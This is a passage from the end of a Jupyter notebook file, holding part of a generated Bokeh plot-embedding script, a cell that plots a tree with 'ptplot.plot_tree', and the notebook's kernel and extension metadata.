[{\"docid\":\"4eec22b6-251a-4358-b905-989e6c838545\",\"roots\":{\"1124\":\"59d1e9f2-7c95-4e5b-bac3-d7d8b7489c99\"}}];\n root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n }\n if (root.Bokeh !== undefined) {\n embed_document(root);\n } else {\n var attempts = 0;\n var timer = setInterval(function(root) {\n if (root.Bokeh !== undefined) {\n embed_document(root);\n clearInterval(timer);\n }\n attempts++;\n if (attempts > 100) {\n console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n clearInterval(timer);\n }\n }, 10, root)\n }\n})(window);", "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "1124" } }, "output_type": "display_data" } ], "persistentId": "86f9303d-6c99-4344-99a8-4eaa99cfd414", "text": "ptplot.plot_tree(p_tree_leg)" }, "executionTime": "2019-12-13T22:48:42.411Z" } ], "kernelspec": { "display_name": "Python (condadev)", "language": "python", "name": "condadev" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.7.9" }, "latex_envs": { "LaTeX_envs_menu_present": true, "autoclose": false, "autocomplete": true, "bibliofile": "biblio.bib", "cite_by": "apalike", "current_citInitial": 1, "eqLabelWithNumbers": true, "eqNumInitial": 1, "hotkeys": { "equation": "Ctrl-E", "itemize": "Ctrl-I" }, "labels_anchors": false, "latex_user_defs": false, "report_style_numbering": false, "user_envs_cfg": false }, "toc": { "base_numbering": 1, "nav_menu": {}, "number_sections": false, "sideBar": true, "skip_h1_title": false, "title_cell": "Table of Contents", "title_sidebar": "Contents", "toc_cell": true, "toc_position": {}, "toc_section_display": true, "toc_window_display": true }, "uuid": "ab38641e-21c4-4605-b546-f908997c72b5", "varInspector": { "cols": { "lenName": 16, "lenType": 16, "lenVar": 40 }, "kernels_config": { "python": { "delete_cmd_postfix": "", "delete_cmd_prefix": "del ", "library": "var_list.py", "varRefreshCmd": "print(var_dic_list())" }, "r": { "delete_cmd_postfix": ") ", "delete_cmd_prefix": "rm(", "library": "var_list.r", "varRefreshCmd": "cat(var_dic_list()) " } }, "types_to_exclude": [ "module", "function", "builtin_function_or_method", "instance", "_Feature" ], "window_display": false }, "widgets": { "application/vnd.jupyter.widget-state+json": { "state": {}, "version_major": 2, "version_minor": 0 } } }, "nbformat": 4, "nbformat_minor": 4 }